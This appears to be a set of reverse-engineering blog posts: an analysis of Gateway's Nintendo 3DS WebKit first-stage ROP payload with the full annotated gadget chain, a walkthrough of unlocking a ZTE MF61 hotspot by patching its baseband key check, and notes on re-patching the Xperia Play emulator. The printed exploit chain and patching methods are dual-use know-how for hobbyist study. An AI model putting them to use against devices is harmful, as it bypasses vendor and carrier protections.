It is a huge mess, but for those who are curious, here it is. The bulk of the code is useless obfuscation (for example, it would pop 9 registers full of junk data and then fill the same 9 registers with more junk data afterwards). However, the obfuscation is easy to get past if you just ignore everything except gadgets that do 1) memory loads, 2) memory stores, 3) flag sets, or 4) function calls. Every other gadget is useless. They also do this weird thing where they “memcpy” one part of the stack to another part (which goes past the current SP). However, comparing the two blocks of data (before and after the copy) shows nothing different aside from some garbage values.

Reversing Gateway Ultra First Stage (Part 1)

And now for something completely different…

As a break from Vita hacking, I’ve decided to play around with the Nintendo 3DS exploit released by Gateway yesterday. The 3DS is a much easier console to hack, but unfortunately, the scene is dominated by a piracy company who, ironically, implement various “features” to protect their intellectual property (one such feature purposely bricks any user of a cloned piracy cart–and also “legitimate” users too). Ethics aside, it would be useful to reverse Gateway’s exploits and use them for homebrew loading so I took a quick look at it. The first stage of the exploit is an entry-point into the system that allows code to run in the unprivileged user-mode. It is usually used to exploit a kernel vulnerability, which is the second stage. In the unique case of Gateway, the first stage is broken up into two parts (in order for them to obfuscate their payload). I am only going to look at the first part for now.


The userland vulnerability is a known use-after-free bug in WebKit found in April last year (and no, the latest Vita firmware is not vulnerable). Depending on the user-agent of the 3DS visiting the exploit page, a different payload for that browser version is sent. A GBATemp user has dumped all the possible payloads, and I used the 4.x one in my analysis (although I believe the only differences between the payloads are memory offsets).


This is what the initial first stage payload does:

void *_this = 0x08F10000;
int *read_len = 0x08F10020;
int *buffer = 0x08F01000;
int state = 0;
int i = 0;
IFile_Open(_this, L"dmc:/Launcher.dat", 0x1);
*((int *)_this + 1) = 0x00012000; // fseek according to sm on #3dsdev
IFile_Read(_this, read_len, buffer, 0x4000);

for (i = 0; i < 0x4000/4; i++)
{
    state += 0xD5828281;
    buffer[i] += state;
}

The important part here is that the rest of the payload is decrypted from “Launcher.dat” by creating a stream cipher from a (crappy) PRNG that just increments by 0xD5828281 every iteration. Instead of an xor-pad, it uses an “add”-pad. Otherwise it is pretty standard obfuscation. A neat trick in this ROP payload is the casting of ARM code as Thumb to get gadgets that were not originally compiled into code (I am unsure if they also tried casting RO data as Thumb code, as that is also a way of getting extra gadgets). Another neat trick is emulating loops by using ARM conditional stores to conditionally set the stack pointer to some value (although I was told they used this trick in the original Gateway payload too).
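For anyone who wants to decrypt Launcher.dat offline, the “add”-pad can be written as a standalone routine. The sketch below is a host-side version of the loop above using unsigned 32-bit arithmetic (so wraparound is well defined). `add_pad_encrypt` is a hypothetical inverse that is not part of the payload; it is included only to show that the scheme is trivially reversible.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PAD_STEP 0xD5828281u

/* Decrypt in place: the keystream word i is (i + 1) * PAD_STEP mod 2^32. */
void add_pad_decrypt(uint32_t *buf, size_t words)
{
    uint32_t state = 0;
    for (size_t i = 0; i < words; i++) {
        state += PAD_STEP;
        buf[i] += state;
    }
}

/* Hypothetical inverse: subtract the same keystream. */
void add_pad_encrypt(uint32_t *buf, size_t words)
{
    uint32_t state = 0;
    for (size_t i = 0; i < words; i++) {
        state += PAD_STEP;
        buf[i] -= state;
    }
}
```

To apply it to the real file, one would read 0x4000 bytes starting at offset 0x12000 of Launcher.dat (the seek value and read size used by the ROP chain) as little-endian 32-bit words and pass them to `add_pad_decrypt` with `words` set to 0x1000.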


The first part was very simple and straightforward and was easy to reverse. I am expecting that the second part would involve a lot more code so I may need to work on a tool to extract the gadgets from code. (By the way, thanks to sbJFn5r on #3dsdev for providing me with the WebKit code to look at and sm for the hint about fseek). It is likely that I won’t have the time to continue this though (still working on the Vita) but it seems like many others are farther ahead than me anyways.


For those who care, the raw (annotated) payload for 4.X:

0x08B47400: 0x0010FFFD ; (nop) POP {PC}
0x08B47404: 0x0010FFFD ; (nop) POP {PC}
0x08B47408: 0x0010FFFD ; (nop) POP {PC}
0x08B4740C: 0x0010FFFD ; (nop) POP {PC}
0x08B47410: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B47414: 0x002A5F27 ; R0 = "dmc:"
0x08B47418: 0x00332BEC ; FS_MOUNTSDMC(), then LDMFD   SP!, {R3-R5,PC}
0x08B4741C: 0x08B475F0 ; R3, dummy
0x08B47420: 0x00188008 ; R4, dummy
0x08B47424: 0x001DA00C ; R5, dummy
0x08B47428: 0x0017943B ; Thumb: POP     {R0-R4,R7,PC}
0x08B4742C: 0x08F10000 ; R0 = this
0x08B47430: 0x08B47630 ; R1 = L"dmc:/Launcher.dat"
0x08B47434: 0x00000001 ; R2 = read/only
0x08B47438: 0x0039B020 ; R3, dummy
0x08B4743C: 0x001CC01C ; R4, dummy
0x08B47440: 0x002C6010 ; R7, dummy
0x08B47444: 0x0025B0A8 ; IFile_Open(), then LDMFD   SP!, {R4-R7,PC}
0x08B47448: 0x00231FF0 ; R4, dummy
0x08B4744C: 0x002CBFF0 ; R5, dummy
0x08B47450: 0x00124000 ; R6, dummy
0x08B47454: 0x0033FFFD ; R7, dummy
0x08B47458: 0x0010FFFD ; (nop) POP {PC}
0x08B4745C: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B47460: 0x00012000 ; R0
0x08B47464: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47468: 0x08F10004 ; R1
0x08B4746C: 0x00140450 ; *(int*)0x08F10004 = 0x00012000, then LDMFD   SP!, {R4,PC}
0x08B47470: 0x001CC024 ; R4
0x08B47474: 0x0017943B ; Thumb: POP     {R0-R4,R7,PC}
0x08B47478: 0x08F10000 ; R0 = this
0x08B4747C: 0x08F10020 ; R1 = p_total_read
0x08B47480: 0x08F01000 ; R2 = read_buffer
0x08B47484: 0x00004000 ; R3 = size
0x08B47488: 0x00295FF8 ; R4, dummy
0x08B4748C: 0x00253FFC ; R7, dummy
0x08B47490: 0x002FC8E8 ; IFile_Read, then LDMFD   SP!, {R4-R9,PC}
0x08B47494: 0x002BE030 ; R4, dummy
0x08B47498: 0x00212010 ; R5, dummy
0x08B4749C: 0x00271F40 ; R6, dummy
0x08B474A0: 0x0020C05C ; R7, dummy
0x08B474A4: 0x002DE0C4 ; R8, dummy
0x08B474A8: 0x001B2000 ; R9, dummy || LR, dummy (upon loop)
0x08B474AC: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B474B0: 0x08B4750C ; R0 (&state)
0x08B474B4: 0x001CCC64 ; R0 = *R0 = state, LDMFD   SP!, {R4,PC}
0x08B474B8: 0x001057C4 ; R4, dummy
0x08B474BC: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B474C0: 0xD5828281 ; R1 (seed)
0x08B474C4: 0x00207954 ; R0 = R0 + R1, LDMFD   SP!, {R4,PC}
0x08B474C8: 0x0011FFFD ; R4, dummy
0x08B474CC: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B474D0: 0x08B4750C ; R1 (&state)
0x08B474D4: 0x00140450 ; *R1 = R0 = next random, LDMFD   SP!, {R4,PC}
0x08B474D8: 0x00354850 ; R4, dummy
0x08B474DC: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B474E0: 0x08B47618 ; R0 (&buffer)
0x08B474E4: 0x001CCC64 ; R0 = *R0 = buffer, LDMFD   SP!, {R4,PC}
0x08B474E8: 0x00127F6D ; R4, dummy
0x08B474EC: 0x00100D24 ; LDMFD   SP!, {R4-R6,PC}
0x08B474F0: 0x001037E0 ; R4, dummy
0x08B474F4: 0x08B4748C ; R5, dummy
0x08B474F8: 0x08B4740C ; R6, dummy
0x08B474FC: 0x001CCC64 ; R0 = *R0 (read32 from buffer), LDMFD   SP!, {R4,PC}
0x08B47500: 0x0011BB00 ; R4, dummy
0x08B47504: 0x0010FFFD ; (nop) POP {PC}
0x08B47508: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B4750C: 0x00000000 ; R1 (PRNG state)
0x08B47510: 0x00207954 ; R0 = R0 + R1 (add PRNG state to buffer data), LDMFD   SP!, {R4,PC}
0x08B47514: 0x001303A0 ; R4, dummy
0x08B47518: 0x00103DA8 ; LDMFD   SP!, {R4-R12,PC}
0x08B4751C: 0x00101434 ; R4, dummy
0x08B47520: 0x0022FF64 ; R5, dummy
0x08B47524: 0x001303A0 ; R6, dummy
0x08B47528: 0x08B47400 ; R7, dummy
0x08B4752C: 0x0010FFFD ; R8, dummy
0x08B47530: 0x0010FFFD ; R9, dummy
0x08B47534: 0x00100B5C ; R10, dummy
0x08B47538: 0x0022FE44 ; R11, dummy
0x08B4753C: 0x0010FFFD ; R12, (nop) POP {PC}
0x08B47540: 0x0018114C ; LDMFD   SP!, {R4-R6,LR}, BX R12
0x08B47544: 0x001057C4 ; R4, dummy
0x08B47548: 0x00228AF4 ; R5, dummy
0x08B4754C: 0x00350658 ; R6, dummy
0x08B47550: 0x0010FFFD ; LR, (nop) POP {PC}
0x08B47554: 0x00158DE7 ; R1 = R0 = (decoded data), BLX LR
0x08B47558: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B4755C: 0x08B47618 ; R0 (&buffer)
0x08B47560: 0x001CCC64 ; R0 = *R0 = buffer, LDMFD   SP!, {R4,PC}
0x08B47564: 0x0011FFFD ; R4, dummy
0x08B47568: 0x00119B94 ; *R0 = R1 = (decoded data), LDMFD   SP!, {R4,PC}
0x08B4756C: 0x00106694 ; R4, dummy
0x08B47570: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47574: 0x00000004 ; R1
0x08B47578: 0x00207954 ; R0 = R0 + R1 (buffer + 4), LDMFD   SP!, {R4,PC}
0x08B4757C: 0x00130344 ; R4, dummy
0x08B47580: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47584: 0x08B47618 ; R1 (&buffer)
0x08B47588: 0x00140450 ; *R1 = R0 (set new buffer), LDMFD   SP!, {R4,PC}
0x08B4758C: 0x00100D24 ; R4, dummy
0x08B47590: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47594: 0xF70FB000 ; R1
0x08B47598: 0x00207954 ; R0 = R0 + R1 = 0xFFFFC004, LDMFD   SP!, {R4,PC}
0x08B4759C: 0x00119864 ; R4, dummy
0x08B475A0: 0x001B560C ; SET_FLAGS (R0 != 0), if (flags) R0 = 1, LDMFD   SP!, {R3,PC}
0x08B475A4: 0x002059C0 ; R3, dummy
0x08B475A8: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B475AC: 0x08B47610 ; R0 (val for LR)
0x08B475B0: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B475B4: 0x08F00FFC ; R1
0x08B475B8: 0x00119B94 ; *R0 = R1 = 0x08F00FFC (next stage), LDMFD   SP!, {R4,PC}
0x08B475BC: 0x00355FD4 ; R4, dummy
0x08B475C0: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B475C4: 0x08B474A8 ; R1
0x08B475C8: 0x0020E780 ; if (flags) *R0 = R1 = 0x08B474A8 (loop), LDMFD   SP!, {R4,PC}
0x08B475CC: 0x002C2215 ; R4, dummy
0x08B475D0: 0x0010FFFD ; (nop) POP {PC}
0x08B475D4: 0x0010FFFD ; (nop) POP {PC}
0x08B475D8: 0x00103DA8 ; LDMFD   SP!, {R4-R12,PC}
0x08B475DC: 0x002D5654 ; R4, dummy
0x08B475E0: 0x00103778 ; R5, dummy
0x08B475E4: 0x002FA864 ; R6, dummy
0x08B475E8: 0x00119B94 ; R7, dummy
0x08B475EC: 0x0020E780 ; R8, dummy
0x08B475F0: 0x00128605 ; R9, dummy
0x08B475F4: 0x00103DA8 ; R10, dummy
0x08B475F8: 0x08B475F8 ; R11, dummy
0x08B475FC: 0x0010FFFD ; R12, dummy
0x08B47600: 0x0018114C ; LDMFD   SP!, {R4-R6,LR}
0x08B47604: 0x0010FFFD ; R4, dummy
0x08B47608: 0x002FC8E4 ; R5, dummy
0x08B4760C: 0x001037E0 ; R6, dummy
0x08B47610: 0x0023C494 ; LR (later set to 0x08B474A8)
0x08B47614: 0x002D6A30 ; SP = LR, LDMFD   SP!, {LR,PC}
0x08B47618: 0x08F01000 ; buffer
0x08B4761C: 0x002D6A1C ; 
0x08B47620: 0x08B47400 ; 
0x08B47624: 0x0010FFFD ; 
0x08B47628: 0x0010FFFD ; 
0x08B4762C: 0x002D6A1C ; 
0x08B47630: L"dmc:/Launcher.dat"
0x08B47654: 0x00000000 ; 
0x08B47658: 0x00000000 ; 
0x08B4765C: 0x00000000 ; 
0x08B47660: 0x00000000 ; 
0x08B47664: 0x00000000 ; 
0x08B47668: 0x00000000 ; 
0x08B4766C: 0x002D6A1C ; 
0x08B47670: 0x00000000 ; 
0x08B47674: 0x00000000 ; 
0x08B47678: 0x00000000 ; 
0x08B4767C: 0x00000000 ; 
0x08B47680: 0x00000000 ; 
0x08B47684: 0x00000000 ; 
0x08B47688: 0x00000000 ; 
0x08B4768C: 0x00000000 ; 
0x08B47690: 0x00000000 ; 
0x08B47694: 0x00000000 ; 
0x08B47698: 0x00000000 ; 
0x08B4769C: 0x00000000 ; 
0x08B476A0: 0x00000000 ; 
0x08B476A4: 0x00000000 ; 
0x08B476A8: 0x00000000 ; 
0x08B476AC: 0x00000000 ; 
0x08B476B0: 0x00000000 ; 
0x08B476B4: 0x00000000 ; 
0x08B476B8: 0x00000000 ; 
0x08B476BC: 0x00000000 ; 
0x08B476C0: 0x00000000 ; 
0x08B476C4: 0x00000000 ; 
0x08B476C8: 0x00000000 ; 
0x08B476CC: 0x00000000 ; 
0x08B476D0: 0x00000000 ; 
0x08B476D4: 0x00000000 ; 
0x08B476D8: 0x00000000 ; 
0x08B476DC: 0x00000000 ; 
0x08B476E0: 0x00000000 ; 
0x08B476E4: 0x00000000 ; 
0x08B476E8: 0x00000000 ; 
0x08B476EC: 0x00000000 ; 
0x08B476F0: 0x00000000 ; 
0x08B476F4: 0x00000000 ; 
0x08B476F8: 0x00000000 ; 
0x08B476FC: 0x00000000 ; 
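
The loop test in the payload above relies on 32-bit wraparound: the constant 0xF70FB000 is added to the updated buffer pointer, and the sum only becomes zero once the pointer reaches the end of the 0x4000-byte buffer. Here is a small Python sketch that checks this arithmetic, using only values that appear in the dump. The function names are made up for illustration.

```python
MASK = 0xFFFFFFFF
BUFFER_START = 0x08F01000    # read_buffer passed to IFile_Read
BUFFER_LEN = 0x4000          # size passed to IFile_Read
LOOP_CONSTANT = 0xF70FB000   # value loaded into R1 at 0x08B47594


def loop_continues(next_ptr: int) -> bool:
    """The ROP chain loops while (next_ptr + constant) is non-zero in 32 bits."""
    return ((next_ptr + LOOP_CONSTANT) & MASK) != 0


def count_iterations() -> int:
    """Count how many 32-bit words get decoded before the chain moves on."""
    ptr = BUFFER_START
    iterations = 0
    while True:
        ptr += 4               # buffer + 4, written back to &buffer
        iterations += 1
        if not loop_continues(ptr):
            return iterations
```

The constant is simply the two's complement of the end address (0x08F01000 + 0x4000), so the loop runs 0x1000 times, once per word.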

Unlocking T-Mobile 4G Hotspot (ZTE MF61): A case study

So, I have one of these MiFi clones from T-Mobile and want to unlock it to use on AT&T (I know that AT&T 4G/3G isn’t supported, but I thought maybe I could fix that later). The first thing I tried was contacting T-Mobile, as they are usually very liberal concerning unlock codes. However, this time, T-Mobile (or, as they claim, the manufacturer) isn’t so generous. So I’ve decided to take it upon myself to do it. I will write down the entire procedure here as a case study on how to “reverse engineer” a new device. However, in no way do I consider myself an expert, so feel free to bash me in the comments on what I did wrong. Also, I have decided against releasing any binaries or patches because phone unlocking is a grey area (although it is legal here), but if you read along you should be able to repeat what I did, even though I will also try to generalize.

Getting information

The hardest part of any hack is the figuring-out-how-to-start phase. That’s always tricky. But… let the games begin.

-Wheatley, Portal 2

So before we can do anything, we need to know what to do. The best place to begin is to look at the updater. With a quick look at the extracted files, we find that the files being flashed have names such as “amss.mbn”, “dsp1.mbn”, and such. A quick scan with a hex editor shows that the files are unencrypted and unsigned. That’s good news because it means we have the ability to change the code. A quick Google search shows us that these files are firmware files for Qualcomm basebands. Now, we need to find more information on this Qualcomm chip. You may try some more Google-fu, but I took another path and took apart the device (not recommended if it’s any more complicated). In this case, I found that we are dealing with a Qualcomm MDM8200A device. Google that and you’ll find more information, such as the fact that there are two DSP processors for the modem and one “apps” ARM processor (presumably for T-Mobile’s custom firmware, which is what you see as the web interface). We want to unlock the device, so I assume the work is done in the DSP processor. That’s the first problem. QDSP6 (I found this name through more Google skills) is not a supported processor in IDA Pro, my go-to tool, so we need another way to disassemble it.


Some more Googling (I’m sure you can see a pattern on how this works now) leads me to this. QDSP6 is actually called “Hexagon” by Qualcomm and they kindly provided an ABI and programmer’s guide. I guessed from the documents that there is a toolchain, but no more information is provided about it. More searching led me to believe that the in-house toolchain is proprietary, but luckily, there is an open source implementation that is being worked on. Having the toolchain means that we can use “objdump”, the 2nd most popular disassembly tool [Citation Needed]. So, it’s just a matter of sending dsp1.mbn and dsp2.mbn into objdump -x? Nope. It seems that our friends at ZTE either purposely or automatically (as part of the linker) stripped the “section headers” of the ELF file. I did a quick read of the ELF specifications and found that the “section headers” are not required for the program to run, but provide information for linking and such. What we did have was the “program headers”, which are sort of a stripped down version of the section headers. (Program headers only tell: 1) where each “section” is located in the file and where to load it in memory, 2) is it program or data?, 3) readable? writable?, while section headers give more information like the name of each section and more on what the program/data section’s purpose is.) What I then did was write my own section headers using the program headers as a guide, making up the names and other information (because they are not used in the actual disassembling anyway) with a hex editor. Then I pasted my headers into the file, changed some offsets, and objdump -x surrendered the assembly code. 180MB worth of it.


So we have 180MB worth of code written in a language that could very well be Greek. Luckily, as I’ve mentioned earlier, Qualcomm released a document detailing the QDSP assembly language and how it’s used. Most likely, you would be dealing with a more “popular” processor like ARM or x86 and would have access to more resources. However, for QDSP6/Hexagon, we have two PDF documents and that is basically the Bible that we need to memorize. I then spent a couple of hours learning this new assembly language (assembly isn’t that hard once you embrace it) and figured out the basics needed to reverse engineer (that is: jumps, store/loads, and arithmetic). Now, another problem arises. We have literally 3 million lines of assembly code with no function names, no symbols, and no “sections”. How do we find the goal (the function that checks the NCK key and unlocks the device accordingly) without spending the next two years decoding this mess? Here, we need to make some assumptions. First, we know (through Google) that the AT modem command for inputting the NCK key is AT+ZNCK="keyhere" for ZTE devices. So, let’s look for “ZNCK” in the hex editor of dsp1.mbn and dsp2.mbn. (If you are not as lucky and don’t know what the AT command is, I would put money that the command will contain the word NCK, so just search for that.) In dsp2.mbn, we find a couple of results. One of the results is in a group of other AT commands. Each command is next to a 4-byte hex value and a bunch of zero padding. I would guess that it is a jump table and the hex values are the memory locations of the functions to jump to. Doing a quick memory to file offset conversion (from our ELF program header), we locate the offset in our disassembly dump and find that it starts with an “allocframe” instruction. That means we are at the beginning of a function, so our assumptions must be right. Now, we can get to the crux of the problem, which is figuring out how the keycheck works.
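
The memory to file offset conversion can be scripted instead of done by hand. Below is a minimal Python sketch, assuming a 32-bit little-endian ELF whose program headers are intact (as described above). The function names are made up for illustration, and the code only looks at PT_LOAD entries.

```python
import struct

PT_LOAD = 1  # program header type for loadable segments


def load_segments(elf: bytes):
    """Return (vaddr, file_offset, file_size) for every PT_LOAD program header."""
    header = struct.unpack_from("<16sHHIIIIIHHHHHH", elf, 0)
    e_phoff, e_phentsize, e_phnum = header[5], header[9], header[10]
    segments = []
    for index in range(e_phnum):
        fields = struct.unpack_from("<8I", elf, e_phoff + index * e_phentsize)
        p_type, p_offset, p_vaddr, p_filesz = fields[0], fields[1], fields[2], fields[4]
        if p_type == PT_LOAD:
            segments.append((p_vaddr, p_offset, p_filesz))
    return segments


def vaddr_to_offset(segments, vaddr: int):
    """Translate a memory address into a file offset, or None if it is unmapped."""
    for seg_vaddr, seg_offset, seg_size in segments:
        if seg_vaddr <= vaddr < seg_vaddr + seg_size:
            return seg_offset + (vaddr - seg_vaddr)
    return None
```

Feeding each 4-byte value from the suspected jump table through vaddr_to_offset() gives the file offset to look up; a result of None is a hint that the value is not a pointer into the file after all.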

Mapping out the functions

We now know where the function of interest starts, but we don’t know where it ends. It’s easy to find out though: look for a jump to lr (in this case for this processor, it’s an instruction to jump to r31). We start at the beginning of the function and we copy all the instructions until we see a non-conditional jump. We paste the data into another text file (for easier reference). Then we go to the next location in the disassembly (where it would have jumped to) and copy the instructions until we see another non-conditional jump, and then paste them into the second text file. Keep doing this until you see a jump to r31. We now have most of the function. Notice I kept saying “non-conditional” jumps. That’s because first, we just need the code that ALWAYS runs, just to filter out stuff we don’t need. Now, we should get the other branches just so we have more information. To do this, just follow each jump or function call in the same way as we did for the main function. I would also recommend writing some labels like “branch1” and “func1” for each jump just so you can easily locate two jumps to the same location and such. I would also recommend only doing this up to three “levels” max (three function calls or three jumps) because it could get real messy real quick, and we will need more information so we can filter out un-needed code, as I will detail in the next section.
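
The copy-and-paste procedure for the “always runs” path can be automated. This is only a rough Python sketch under loud assumptions: the listing is a dictionary from address to instruction text, every instruction is 4 bytes, an unconditional jump looks like "jump 0x...", a conditional one starts with "if", and the return looks like "jumpr r31". Real objdump output will need its own parsing.

```python
def trace_always_path(listing, start, step=4, limit=10000):
    """Follow only unconditional jumps from start until a jump to r31.

    listing maps an address to its instruction text (hypothetical format).
    Returns the list of (address, text) pairs in execution order.
    """
    path = []
    seen = set()
    addr = start
    while addr in listing and addr not in seen and len(path) < limit:
        seen.add(addr)
        text = listing[addr].strip()
        path.append((addr, text))
        if text.startswith("jumpr r31"):
            break                              # return: end of the function
        if text.startswith("jump "):
            addr = int(text.split()[1], 16)    # follow the unconditional jump
        else:
            addr += step                       # conditional jumps fall through
    return path
```

Conditional branches are deliberately ignored here; they can be traced afterwards by calling the same function with the branch target as the new start.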

Finding data references

Right now, we are almost completely blind. All we know is what code is run. We don’t know the names of functions or what they do, and it would take forever to “map” every function and every function every function calls (and so on). So we need to obtain some information. The best would be to see what data the code is using. For this processor (and likely many others), a “global pointer” is used to refer to some constant data. So, look for references to “gp” in the disassembly. Searching from the very beginning of the program, we find that the global pointer is set to 0x3500000, and according to the ELF headers, that is a section of the dsp2.mbn file at some file offset. In the section we care about, look for references to “gp” and use the offsets you find to locate the data they refer to. I would recommend adding some comments about them in the code so we don’t forget about them. Now, the global pointer isn’t everything; we can have regular hard-coded pointers to constant areas of memory. Look for registers being set to large numbers. These are likely parameters to function calls that are too big to be just numerical data and are more likely pointers. Use the ELF header to translate the memory locations to file offsets. In this case (for this processor), some values may be split into rS.h and rS.l; these are memory locations that are too “large” to be set in the register at once. Just convert rS.h into a 16 bit integer, rS.l into a 16 bit integer (both might require zero padding in front), then combine them into one 32 bit integer where rS.h’s value is in front of rS.l’s value. For example, we have: r1.h = #384; r1.l = #4624. In hex, those are 0x0180 and 0x1210, which makes r1 == 0x1801210. You should also make some comments in the code about the data that is being used. Now, predict standard library calls. This may be the hardest step because it involves guessing, and one incorrect guess may make other guesses more wrong.
You don’t have much information to go by, but you know 1) the values of some of the data being passed into function calls, and 2) library calls will usually be near the start of the program, or at least very far away from the current function. This will be harder if the function you are trying to map is already near the beginning of the program. The function I’m mapping is found at 0xf84c54, and most function calls are close to it. When I see a function call to 0xb02760, I know that it might be a library call. 3) Some of the more “common” functions and the types of parameters they accept. You don’t need to figure out all of the library calls, just enough to get an idea of what the code is doing so you don’t try to map out these functions (trying to map out strcpy, for example, will get messy real quick). For example, one function call I see takes a data pointer from a “gp” offset, a string that contains “%s: %d”, and some more data. I will assume it is calling fprintf(). I see another function being called many times throughout the code, and it always accepts two pointers (where the second one may be a constant) and a number. I will assume it is calling memcpy().
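
The rS.h / rS.l combination described earlier is easy to get wrong by hand, so here is a tiny Python sketch of it. The function name is made up for illustration; the example values are the ones from the text.

```python
def combine_halves(high: int, low: int) -> int:
    """Build the 32-bit register value from its rS.h and rS.l halves."""
    return ((high & 0xFFFF) << 16) | (low & 0xFFFF)


# r1.h = #384; r1.l = #4624
r1 = combine_halves(384, 4624)
```

Printing hex(r1) gives 0x1801210, matching the value worked out by hand.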


This may be the most boring part. You should have enough information now to try to write code in a higher level language that does what the assembly code says. I would recommend doing this because it is much easier to see logic this way. I used C and started by doing a “literal” transcription using stuff like “r0-r31” as variable names and using goto. Then go back and try to simplify each section. In my process, I found that the unlock key is checked through a sort of hash function. It takes the user input, passes it through a huge algorithm of and/or/add/sub of more than 1000 lines, and takes the result and compares it to a hard coded value in the NV ram (storage area for the device). Here, I made a choice to not go through and re-code this algorithm for two reasons. First, it would be of little use, as the key check doesn’t use a known value like the IMEI and relies on a hard coded value in the NV ram that you need to extract (which a regular user might have trouble doing). Second, after decoding it, we would have to do the algorithm backwards to find the key from the “known value” in the NV ram (and it could be that it would be impossible to work backwards). So I took the easy way out and made a 4-byte patch where I let the program compare the known value to itself instead of to the generated hash from the input, and flashed it to the device. Then I inputted a random key, and the device was unlocked.
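
Applying a small fixed-size patch like this is safer with a script that first checks the bytes being replaced. Here is a generic Python sketch; the function name is made up, and the offset and byte values are placeholders to be filled in from your own disassembly, not the actual patch.

```python
def apply_patch(image: bytes, offset: int, expected: bytes, replacement: bytes) -> bytes:
    """Replace expected with replacement at offset, refusing to patch blindly."""
    if len(expected) != len(replacement):
        raise ValueError("patch must not change the size of the image")
    if image[offset:offset + len(expected)] != expected:
        raise ValueError("unexpected bytes at offset 0x%X" % offset)
    return image[:offset] + replacement + image[offset + len(expected):]
```

Checking the original bytes first means the script fails loudly on a different firmware revision instead of corrupting it.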

Now, remember at the beginning I said the code was unsigned? Because of that I could easily have reflashed the firmware with my “custom” code. However, if your device has some way of preventing modified code from running, you may have no choice but to decode the algorithm.

Reversing the Xperia Play emulator (part deux)

The last time we spoke, I managed to run any PSX game on the Xperia Play by redirecting some function calls. Well, since then Sony (you could say) fixed it (still don’t know how, I should look into it one day, I’m guessing they revoked the certificates for Crash Bandicoot) and people running Android 2.3.4 on the Xperia Play can’t use PSXPeria anymore. I re-patched it a while ago, but never got the chance to modify the patching tool to use the new method (I really hate Java and don’t want to use it, so I held back) until today. As is customary with my releases, I will begin by telling more than what you want to know about how it works.

Previously on “cracking the emulator”…

If you haven’t read the last posts I’ve made about how I reverse engineered the emulator data format and binary, you may want to, but I’ll summarize it in a few words. Basically, the emulator was separated into two binaries: bin-one decrypts bin-two, and bin-two asks bin-one to decrypt and load the game’s table-of-contents, which is used to load the game. The TOC is important because anyone can replace the game data files, but it won’t load because the TOC contains addresses of the places to decompress in the game data. Well, after the hard part of reversing the formats and finding all this out, the actual patch was fairly easy. All we did was make a new library with the same function name as the one that is used by bin-two to query bin-one for the TOC, use it to load the TOC for our custom game, and make sure that library loads before Sony’s. The rest is almost magic. We don’t need to overwrite any function pointers or even touch the emulator because the linker looks for the first definition of a function and calls it.

How Sony made our lives harder

So version 1 is always easiest to break. This applies for almost everything. The PSP, the iPhone, the DS, etc. Version 2 is where it gets real. So what are the changes? First of all, no more bi-binary system. There is a single binary that does both the decrypting and emulating. Oh, and they removed the symbols so we can no longer search for “GetImageToc” and find where the function is. Also, they’ve started verifying the ISOs.

Finding the needle

Before we can begin to think about patching, we first need to find what to patch. As I’ve mentioned, Sony removed the symbols, so we no longer know what the function names are. We CAN try to map out the entire binary (10MB) and look for something that does what appears to be decrypting a TOC, but we don’t have months or a team of assembly experts. What we DO have is the older version of the binary that has the symbols. Assuming that they didn’t rewrite the emulator from scratch, the structure should be similar. We open up the old binary, find the function that calls the ones we want to patch, and look for identifying characteristics. What are they? Well, we look for mentions of unique strings and unique calls to standard functions (unique as in something like atoi, not malloc, which is called every other line). Luckily we have both. It seems like a few lines before the function we are interested in, the program does something with the string “/data/” and sometime afterwards, uncompress is called. Now we have the address of the functions we want to patch.
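
A first pass at finding such anchors can be done without a disassembler by listing where a string occurs in each binary. Here is a minimal Python sketch; the function name is made up for illustration.

```python
def find_all(data: bytes, needle: bytes):
    """Return every file offset at which needle occurs in data."""
    hits = []
    pos = data.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = data.find(needle, pos + 1)
    return hits
```

Running find_all() with b"/data/" on both the old (with symbols) and new (stripped) binaries gives the string offsets to cross-reference in the disassembler; the code that references the string still has to be located there.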

Patching the function

Well, here’s our second problem. What do we patch the function with? We are limited to the length of the original function, but I’m sure that’s not a problem for experts. I’m not an expert though, so how about we steal what Sony did in version 1? We use dlsym to call the function from a loaded binary in memory. After a quick trip to an assembly reference, I wrote the code for the patch. I would go into more detail, but I believe my comments in the code explain it better than I could. The only other thing we need is to manually define the address for “dlsym” and the offset for the name of the function. ARM assembly uses relative addresses, so I haven’t come up with a quick way to do this yet. For now, I’m using a calculator and a piece of paper to find the address of dlsym relative to the patch in the program. Comment if you have a better way.
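
The calculator-and-paper step can be replaced with a few lines of Python. This sketch encodes an ARM-mode BL instruction from the address of the instruction to the address of the target, assuming both are in ARM (not Thumb) mode and use the same address space (for example, both as shown in the disassembler). The function names are made up for illustration.

```python
import struct


def encode_arm_bl(instr_addr: int, target_addr: int) -> int:
    """Return the 32-bit ARM encoding of `BL target_addr` placed at instr_addr."""
    delta = target_addr - (instr_addr + 8)   # PC reads as instruction address + 8
    if delta % 4 != 0:
        raise ValueError("target is not word aligned relative to the patch")
    words = delta // 4
    if not -(1 << 23) <= words < (1 << 23):
        raise ValueError("target is out of range for a single BL")
    return 0xEB000000 | (words & 0xFFFFFF)   # cond=AL, BL, signed 24-bit offset


def bl_bytes(instr_addr: int, target_addr: int) -> bytes:
    """Little-endian bytes of the BL, ready to paste into a hex editor."""
    return struct.pack("<I", encode_arm_bl(instr_addr, target_addr))
```

A branch to itself encodes as 0xEBFFFFFE, which is a handy value for checking the sign handling.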

Phase 2

